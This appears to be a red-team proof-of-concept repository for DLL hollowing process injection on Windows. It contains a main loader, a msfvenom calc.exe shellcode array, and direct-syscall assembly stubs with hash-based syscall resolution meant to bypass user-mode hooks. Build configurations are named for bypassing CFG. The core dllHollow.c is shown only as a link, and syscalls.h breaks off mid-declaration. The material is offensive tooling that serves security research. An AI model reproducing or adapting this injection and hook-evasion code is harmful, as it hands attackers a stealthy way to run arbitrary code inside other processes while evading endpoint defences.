├── process_injection_dll_hollow_syscalls
    ├── src
    │   ├── dllHollow.c
    │   ├── dllHollow.h
    │   ├── shellcode.c
    │   ├── main.cpp
    │   ├── syscallsstubs.asm
    │   ├── syscalls.c
    │   └── syscalls.h
    ├── process_injection_dll_hollow_syscalls.vcxproj.user
    ├── process_injection_dll_hollow_syscalls.vcxproj.filters
    └── process_injection_dll_hollow_syscalls.vcxproj
├── README.md
└── process_injection_dll_hollow_syscalls.sln


/process_injection_dll_hollow_syscalls/src/dllHollow.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECFORCE/DLL-Hollow-PoC/HEAD/process_injection_dll_hollow_syscalls/src/dllHollow.c


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/dllHollow.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "windows.h"
3 | 
4 | 
5 | 
6 | 
7 | EXTERN_C PVOID inject(unsigned char *shellcode, SIZE_T len, DWORD pid);


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DLL Hollow PoC
2 | 
3 | DLL Hollowing PoC - Remote and Self shellcode injection
4 | 
5 | Blog Post: https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/
6 | 


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/process_injection_dll_hollow_syscalls.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/shellcode.c:
--------------------------------------------------------------------------------
 1 | #pragma clang diagnostic ignored "-Woverlength-strings"
 2 | #include <Windows.h>
 3 | 
 4 | // msfvenom -a x64 --platform windows -p windows/x64/exec cmd=calc.exe EXITFUNC=thread -f C
 5 | // Payload size : 276 bytes
 6 | unsigned char shellcode[] =
 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
22 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
25 | "\x63\x2e\x65\x78\x65\x00";
26 | 
27 | SIZE_T shellcode_len = sizeof(shellcode);
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/main.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | DLL Hollow process injection PoC
 3 | Author: Dimitri Di Cristofaro (GlenX) @d_glenx
 4 | Arch: x86-64
 5 | Copyright (c) 2021 SECFORCE (Dimitri Di Cristofaro)
 6 | 	This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
 7 | 	This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
 8 | 	You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.
 9 | */
10 | #include <windows.h>
11 | #include <stdio.h>
12 | #include "dllHollow.h"
13 | #include "shellcode.c"
14 | #include "syscalls.h"
15 | 
16 | 
17 | int main(int argc, char** argv) {
18 | 	DWORD pid = 0;
19 | 	int status = 0;
20 | 	PVOID remote_addr = NULL;
21 | 
22 | 
23 | 	if (argc == 2) {
24 | 		pid = atoi(argv[1]);
25 | 		printf("Injecting into PID %d", pid);
26 | 	}
27 | 	else {
28 | 		printf("Injecting into myself\n");
29 | 		pid = 0;
30 | 	}
31 | 	
32 | 	wprintf(L"Injecting %d bytes of shellcode\n", shellcode_len);
33 | 
34 | 	// Dll Hollow
35 | 	remote_addr = inject(shellcode, shellcode_len, pid);
36 | 
37 | 	if (remote_addr != NULL) {
38 | 		if (pid == 0) pid = GetProcessId(GetCurrentProcess());
39 | 		printf("Injection done! Check memory @ 0x%p of process with PID %d\n", remote_addr, pid);
40 | 	}
41 | 	else {
42 | 		printf("Injection Failed!\n");
43 | 	}
44 | 
45 | 
46 | 	printf("Keeping the process alive.. Press any key to exit..\n");
47 | 	getchar();
48 | 		
49 | 	return 0;
50 | }


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/process_injection_dll_hollow_syscalls.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="src\dllHollow.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="src\main.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="src\shellcode.c">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |     <ClCompile Include="src\syscalls.c">
28 |       <Filter>Source Files</Filter>
29 |     </ClCompile>
30 |   </ItemGroup>
31 |   <ItemGroup>
32 |     <ClInclude Include="src\dllHollow.h">
33 |       <Filter>Source Files</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="src\syscalls.h">
36 |       <Filter>Source Files</Filter>
37 |     </ClInclude>
38 |   </ItemGroup>
39 |   <ItemGroup>
40 |     <MASM Include="src\syscallsstubs.asm">
41 |       <Filter>Source Files</Filter>
42 |     </MASM>
43 |   </ItemGroup>
44 | </Project>


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30320.27
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "process_injection_dll_hollow_syscalls", "process_injection_dll_hollow_syscalls\process_injection_dll_hollow_syscalls.vcxproj", "{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Bypass CFG (NTDLL Patch)|x64 = Bypass CFG (NTDLL Patch)|x64
11 | 		Bypass CFG (NTDLL Patch)|x86 = Bypass CFG (NTDLL Patch)|x86
12 | 		Bypass CFG(ThreadCTX)|x64 = Bypass CFG(ThreadCTX)|x64
13 | 		Bypass CFG(ThreadCTX)|x86 = Bypass CFG(ThreadCTX)|x86
14 | 		CFG Disabled|x64 = CFG Disabled|x64
15 | 		CFG Disabled|x86 = CFG Disabled|x86
16 | 		CFG Enabled|x64 = CFG Enabled|x64
17 | 		CFG Enabled|x86 = CFG Enabled|x86
18 | 		Debug|x64 = Debug|x64
19 | 		Debug|x86 = Debug|x86
20 | 		Release|x64 = Release|x64
21 | 		Release|x86 = Release|x86
22 | 	EndGlobalSection
23 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
24 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG (NTDLL Patch)|x64.ActiveCfg = Bypass CFG (NTDLL Patch)|x64
25 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG (NTDLL Patch)|x64.Build.0 = Bypass CFG (NTDLL Patch)|x64
26 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG (NTDLL Patch)|x86.ActiveCfg = Bypass CFG (NTDLL Patch)|Win32
27 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG (NTDLL Patch)|x86.Build.0 = Bypass CFG (NTDLL Patch)|Win32
28 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG(ThreadCTX)|x64.ActiveCfg = CFG Enabled - Bypass CFG( Thread CTX)|x64
29 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG(ThreadCTX)|x64.Build.0 = CFG Enabled - Bypass CFG( Thread CTX)|x64
30 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG(ThreadCTX)|x86.ActiveCfg = CFG Enabled - Bypass CFG( Thread CTX)|Win32
31 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Bypass CFG(ThreadCTX)|x86.Build.0 = CFG Enabled - Bypass CFG( Thread CTX)|Win32
32 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Disabled|x64.ActiveCfg = CFG Disabled|x64
33 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Disabled|x64.Build.0 = CFG Disabled|x64
34 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Disabled|x86.ActiveCfg = CFG Disabled|Win32
35 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Disabled|x86.Build.0 = CFG Disabled|Win32
36 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Enabled|x64.ActiveCfg = CFG Enabled|x64
37 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Enabled|x64.Build.0 = CFG Enabled|x64
38 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Enabled|x86.ActiveCfg = CFG Enabled|Win32
39 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.CFG Enabled|x86.Build.0 = CFG Enabled|Win32
40 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Debug|x64.ActiveCfg = Bypass CFG (NTDLL Patch)|x64
41 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Debug|x64.Build.0 = Bypass CFG (NTDLL Patch)|x64
42 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Debug|x86.ActiveCfg = Debug|Win32
43 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Debug|x86.Build.0 = Debug|Win32
44 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Release|x64.ActiveCfg = Bypass CFG (NTDLL Patch)|x64
45 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Release|x64.Build.0 = Bypass CFG (NTDLL Patch)|x64
46 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Release|x86.ActiveCfg = Release|Win32
47 | 		{A2EFAB2F-84D0-419A-8DE7-9CA18092BC47}.Release|x86.Build.0 = Release|Win32
48 | 	EndGlobalSection
49 | 	GlobalSection(SolutionProperties) = preSolution
50 | 		HideSolutionNode = FALSE
51 | 	EndGlobalSection
52 | 	GlobalSection(ExtensibilityGlobals) = postSolution
53 | 		SolutionGuid = {FCD19C82-6079-477C-B525-200942E8695D}
54 | 	EndGlobalSection
55 | EndGlobal
56 | 


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/syscallsstubs.asm:
--------------------------------------------------------------------------------
  1 | 
  2 | .code
  3 | 
  4 | EXTERN SW2_GetSyscallNumber: PROC
  5 | 
  6 | NtProtectVirtualMemory PROC
  7 | 	push rcx                   ; Save registers.
  8 | 	push rdx
  9 | 	push r8
 10 | 	push r9
 11 | 	mov ecx, 0415033ABh        ; Load function hash into ECX.
 12 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 13 | 	pop r9                     ; Restore registers.
 14 | 	pop r8
 15 | 	pop rdx
 16 | 	pop rcx
 17 | 	mov r10, rcx
 18 | 	syscall                    ; Invoke system call.
 19 | 	ret
 20 | NtProtectVirtualMemory ENDP
 21 | 
 22 | NtAllocateVirtualMemory PROC
 23 | 	push rcx                   ; Save registers.
 24 | 	push rdx
 25 | 	push r8
 26 | 	push r9
 27 | 	mov ecx, 03595233Bh        ; Load function hash into ECX.
 28 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 29 | 	pop r9                     ; Restore registers.
 30 | 	pop r8
 31 | 	pop rdx
 32 | 	pop rcx
 33 | 	mov r10, rcx
 34 | 	syscall                    ; Invoke system call.
 35 | 	ret
 36 | NtAllocateVirtualMemory ENDP
 37 | 
 38 | NtWriteVirtualMemory PROC
 39 | 	push rcx                   ; Save registers.
 40 | 	push rdx
 41 | 	push r8
 42 | 	push r9
 43 | 	mov ecx, 00B97293Dh        ; Load function hash into ECX.
 44 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 45 | 	pop r9                     ; Restore registers.
 46 | 	pop r8
 47 | 	pop rdx
 48 | 	pop rcx
 49 | 	mov r10, rcx
 50 | 	syscall                    ; Invoke system call.
 51 | 	ret
 52 | NtWriteVirtualMemory ENDP
 53 | 
 54 | NtCreateThreadEx PROC
 55 | 	push rcx                   ; Save registers.
 56 | 	push rdx
 57 | 	push r8
 58 | 	push r9
 59 | 	mov ecx, 0003952E3h        ; Load function hash into ECX.
 60 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 61 | 	pop r9                     ; Restore registers.
 62 | 	pop r8
 63 | 	pop rdx
 64 | 	pop rcx
 65 | 	mov r10, rcx
 66 | 	syscall                    ; Invoke system call.
 67 | 	ret
 68 | NtCreateThreadEx ENDP
 69 | 
 70 | NtWaitForSingleObject PROC
 71 | 	push rcx                   ; Save registers.
 72 | 	push rdx
 73 | 	push r8
 74 | 	push r9
 75 | 	mov ecx, 03EA04C4Dh        ; Load function hash into ECX.
 76 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 77 | 	pop r9                     ; Restore registers.
 78 | 	pop r8
 79 | 	pop rdx
 80 | 	pop rcx
 81 | 	mov r10, rcx
 82 | 	syscall                    ; Invoke system call.
 83 | 	ret
 84 | NtWaitForSingleObject ENDP
 85 | 
 86 | NtCreateThread PROC
 87 | 	push rcx                   ; Save registers.
 88 | 	push rdx
 89 | 	push r8
 90 | 	push r9
 91 | 	mov ecx, 0142C8815h        ; Load function hash into ECX.
 92 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
 93 | 	pop r9                     ; Restore registers.
 94 | 	pop r8
 95 | 	pop rdx
 96 | 	pop rcx
 97 | 	mov r10, rcx
 98 | 	syscall                    ; Invoke system call.
 99 | 	ret
100 | NtCreateThread ENDP
101 | 
102 | NtMapViewOfSection PROC
103 | 	push rcx                   ; Save registers.
104 | 	push rdx
105 | 	push r8
106 | 	push r9
107 | 	mov ecx, 01F071C6Ah        ; Load function hash into ECX.
108 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
109 | 	pop r9                     ; Restore registers.
110 | 	pop r8
111 | 	pop rdx
112 | 	pop rcx
113 | 	mov r10, rcx
114 | 	syscall                    ; Invoke system call.
115 | 	ret
116 | NtMapViewOfSection ENDP
117 | 
118 | NtCreateSection PROC
119 | 	push rcx                   ; Save registers.
120 | 	push rdx
121 | 	push r8
122 | 	push r9
123 | 	mov ecx, 034A314EDh        ; Load function hash into ECX.
124 | 	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
125 | 	pop r9                     ; Restore registers.
126 | 	pop r8
127 | 	pop rdx
128 | 	pop rcx
129 | 	mov r10, rcx
130 | 	syscall                    ; Invoke system call.
131 | 	ret
132 | NtCreateSection ENDP
133 | 
134 | end


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/syscalls.c:
--------------------------------------------------------------------------------
  1 | #include "syscalls.h"
  2 | 
  3 | // Code below is adapted from @modexpblog. Read linked article for more details.
  4 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
  5 | 
  6 | SW2_SYSCALL_LIST SW2_SyscallList;
  7 | 
  8 | DWORD SW2_HashSyscall(PCSTR FunctionName)
  9 | {
 10 |     DWORD i = 0;
 11 |     DWORD Hash = SW2_SEED;
 12 | 
 13 |     while (FunctionName[i])
 14 |     {
 15 |         WORD PartialName = *(WORD*)((ULONG64)FunctionName + i++);
 16 |         Hash ^= PartialName + SW2_ROR8(Hash);
 17 |     }
 18 | 
 19 |     return Hash;
 20 | }
 21 | 
 22 | BOOL SW2_PopulateSyscallList()
 23 | {
 24 |     // Return early if the list is already populated.
 25 |     if (SW2_SyscallList.Count) return TRUE;
 26 | 
 27 |     PSW2_PEB Peb = (PSW2_PEB)__readgsqword(0x60);
 28 |     PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
 29 |     PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
 30 |     PVOID DllBase = NULL;
 31 | 
 32 |     // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
 33 |     // in the list, so it's safer to loop through the full list and find it.
 34 |     PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
 35 |     for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
 36 |     {
 37 |         DllBase = LdrEntry->DllBase;
 38 |         PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
 39 |         PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
 40 |         PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
 41 |         DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
 42 |         if (VirtualAddress == 0) continue;
 43 | 
 44 |         ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW2_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);
 45 | 
 46 |         // If this is NTDLL.dll, exit loop.
 47 |         PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
 48 | 
 49 |         if ((*(ULONG*)DllName | 0x20202020) != 'ldtn') continue;
 50 |         if ((*(ULONG*)(DllName + 4) | 0x20202020) == 'ld.l') break;
 51 |     }
 52 | 
 53 |     if (!ExportDirectory) return FALSE;
 54 | 
 55 |     DWORD NumberOfNames = ExportDirectory->NumberOfNames;
 56 |     PDWORD Functions = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
 57 |     PDWORD Names = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
 58 |     PWORD Ordinals = SW2_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
 59 | 
 60 |     // Populate SW2_SyscallList with unsorted Zw* entries.
 61 |     DWORD i = 0;
 62 |     PSW2_SYSCALL_ENTRY Entries = SW2_SyscallList.Entries;
 63 |     do
 64 |     {
 65 |         PCHAR FunctionName = SW2_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
 66 | 
 67 |         // Is this a system call?
 68 |         if (*(USHORT*)FunctionName == 'wZ')
 69 |         {
 70 |             Entries[i].Hash = SW2_HashSyscall(FunctionName);
 71 |             Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
 72 | 
 73 |             i++;
 74 |             if (i == SW2_MAX_ENTRIES) break;
 75 |         }
 76 |     } while (--NumberOfNames);
 77 | 
 78 |     // Save total number of system calls found.
 79 |     SW2_SyscallList.Count = i;
 80 | 
 81 |     // Sort the list by address in ascending order.
 82 |     for (DWORD i = 0; i < SW2_SyscallList.Count - 1; i++)
 83 |     {
 84 |         for (DWORD j = 0; j < SW2_SyscallList.Count - i - 1; j++)
 85 |         {
 86 |             if (Entries[j].Address > Entries[j + 1].Address)
 87 |             {
 88 |                 // Swap entries.
 89 |                 SW2_SYSCALL_ENTRY TempEntry;
 90 | 
 91 |                 TempEntry.Hash = Entries[j].Hash;
 92 |                 TempEntry.Address = Entries[j].Address;
 93 | 
 94 |                 Entries[j].Hash = Entries[j + 1].Hash;
 95 |                 Entries[j].Address = Entries[j + 1].Address;
 96 | 
 97 |                 Entries[j + 1].Hash = TempEntry.Hash;
 98 |                 Entries[j + 1].Address = TempEntry.Address;
 99 |             }
100 |         }
101 |     }
102 | 
103 |     return TRUE;
104 | }
105 | 
106 | EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash)
107 | {
108 |     // Ensure SW2_SyscallList is populated.
109 |     if (!SW2_PopulateSyscallList()) return -1;
110 | 
111 |     for (DWORD i = 0; i < SW2_SyscallList.Count; i++)
112 |     {
113 |         if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
114 |         {
115 |             return i;
116 |         }
117 |     }
118 | 
119 |     return -1;
120 | }
121 | 


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/src/syscalls.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | // Code below is adapted from @modexpblog. Read linked article for more details.
  4 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
  5 | 
  6 | #ifndef SW2_HEADER_H_
  7 | #define SW2_HEADER_H_
  8 | 
  9 | #include <windows.h>
 10 | 
 11 | #define SW2_SEED 0x9A4BC5C1
 12 | #define SW2_ROL8(v) (v << 8 | v >> 24)
 13 | #define SW2_ROR8(v) (v >> 8 | v << 24)
 14 | #define SW2_ROX8(v) ((SW2_SEED % 2) ? SW2_ROL8(v) : SW2_ROR8(v))
 15 | #define SW2_MAX_ENTRIES 500
 16 | #define SW2_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
 17 | 
 18 | // Typedefs are prefixed to avoid pollution.
 19 | 
 20 | typedef struct _SW2_SYSCALL_ENTRY
 21 | {
 22 |     DWORD Hash;
 23 |     DWORD Address;
 24 | } SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;
 25 | 
 26 | typedef struct _SW2_SYSCALL_LIST
 27 | {
 28 |     DWORD Count;
 29 |     SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
 30 | } SW2_SYSCALL_LIST, *PSW2_SYSCALL_LIST;
 31 | 
 32 | typedef struct _SW2_PEB_LDR_DATA {
 33 | 	BYTE Reserved1[8];
 34 | 	PVOID Reserved2[3];
 35 | 	LIST_ENTRY InMemoryOrderModuleList;
 36 | } SW2_PEB_LDR_DATA, *PSW2_PEB_LDR_DATA;
 37 | 
 38 | typedef struct _SW2_LDR_DATA_TABLE_ENTRY {
 39 | 	PVOID Reserved1[2];
 40 | 	LIST_ENTRY InMemoryOrderLinks;
 41 | 	PVOID Reserved2[2];
 42 | 	PVOID DllBase;
 43 | } SW2_LDR_DATA_TABLE_ENTRY, *PSW2_LDR_DATA_TABLE_ENTRY;
 44 | 
 45 | typedef struct _SW2_PEB {
 46 | 	BYTE Reserved1[2];
 47 | 	BYTE BeingDebugged;
 48 | 	BYTE Reserved2[1];
 49 | 	PVOID Reserved3[2];
 50 | 	PSW2_PEB_LDR_DATA Ldr;
 51 | } SW2_PEB, *PSW2_PEB;
 52 | 
 53 | DWORD SW2_HashSyscall(PCSTR FunctionName);
 54 | BOOL SW2_PopulateSyscallList();
 55 | EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash);
 56 | 
 57 | #ifndef InitializeObjectAttributes
 58 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
 59 | 	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
 60 | 	(p)->RootDirectory = r;                           \
 61 | 	(p)->Attributes = a;                              \
 62 | 	(p)->ObjectName = n;                              \
 63 | 	(p)->SecurityDescriptor = s;                      \
 64 | 	(p)->SecurityQualityOfService = NULL;             \
 65 | }
 66 | #endif
 67 | 
 68 | typedef struct _UNICODE_STRING
 69 | {
 70 | 	USHORT Length;
 71 | 	USHORT MaximumLength;
 72 | 	PWSTR  Buffer;
 73 | } UNICODE_STRING, *PUNICODE_STRING;
 74 | 
 75 | typedef struct _PS_ATTRIBUTE
 76 | {
 77 | 	ULONG  Attribute;
 78 | 	SIZE_T Size;
 79 | 	union
 80 | 	{
 81 | 		ULONG Value;
 82 | 		PVOID ValuePtr;
 83 | 	} u1;
 84 | 	PSIZE_T ReturnLength;
 85 | } PS_ATTRIBUTE, *PPS_ATTRIBUTE;
 86 | 
 87 | typedef struct _OBJECT_ATTRIBUTES
 88 | {
 89 | 	ULONG           Length;
 90 | 	HANDLE          RootDirectory;
 91 | 	PUNICODE_STRING ObjectName;
 92 | 	ULONG           Attributes;
 93 | 	PVOID           SecurityDescriptor;
 94 | 	PVOID           SecurityQualityOfService;
 95 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
 96 | 
 97 | typedef struct _CLIENT_ID
 98 | {
 99 | 	HANDLE UniqueProcess;
100 | 	HANDLE UniqueThread;
101 | } CLIENT_ID, *PCLIENT_ID;
102 | 
103 | typedef struct _USER_STACK
104 | {
105 | 	PVOID FixedStackBase;
106 | 	PVOID FixedStackLimit;
107 | 	PVOID ExpandableStackBase;
108 | 	PVOID ExpandableStackLimit;
109 | 	PVOID ExpandableStackBottom;
110 | } USER_STACK, *PUSER_STACK;
111 | 
112 | typedef enum _SECTION_INHERIT
113 | {
114 | 	ViewShare = 1,
115 | 	ViewUnmap = 2
116 | } SECTION_INHERIT, *PSECTION_INHERIT;
117 | 
118 | typedef struct _PS_ATTRIBUTE_LIST
119 | {
120 | 	SIZE_T       TotalLength;
121 | 	PS_ATTRIBUTE Attributes[1];
122 | } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
123 | 
124 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
125 | 	IN HANDLE ProcessHandle,
126 | 	IN OUT PVOID * BaseAddress,
127 | 	IN OUT PSIZE_T RegionSize,
128 | 	IN ULONG NewProtect,
129 | 	OUT PULONG OldProtect);
130 | 
131 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
132 | 	IN HANDLE ProcessHandle,
133 | 	IN OUT PVOID * BaseAddress,
134 | 	IN ULONG ZeroBits,
135 | 	IN OUT PSIZE_T RegionSize,
136 | 	IN ULONG AllocationType,
137 | 	IN ULONG Protect);
138 | 
139 | EXTERN_C NTSTATUS NtWriteVirtualMemory(
140 | 	IN HANDLE ProcessHandle,
141 | 	IN PVOID BaseAddress,
142 | 	IN PVOID Buffer,
143 | 	IN SIZE_T NumberOfBytesToWrite,
144 | 	OUT PSIZE_T NumberOfBytesWritten OPTIONAL);
145 | 
146 | EXTERN_C NTSTATUS NtCreateThreadEx(
147 | 	OUT PHANDLE ThreadHandle,
148 | 	IN ACCESS_MASK DesiredAccess,
149 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
150 | 	IN HANDLE ProcessHandle,
151 | 	IN PVOID StartRoutine,
152 | 	IN PVOID Argument OPTIONAL,
153 | 	IN ULONG CreateFlags,
154 | 	IN SIZE_T ZeroBits,
155 | 	IN SIZE_T StackSize,
156 | 	IN SIZE_T MaximumStackSize,
157 | 	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
158 | 
159 | EXTERN_C NTSTATUS NtWaitForSingleObject(
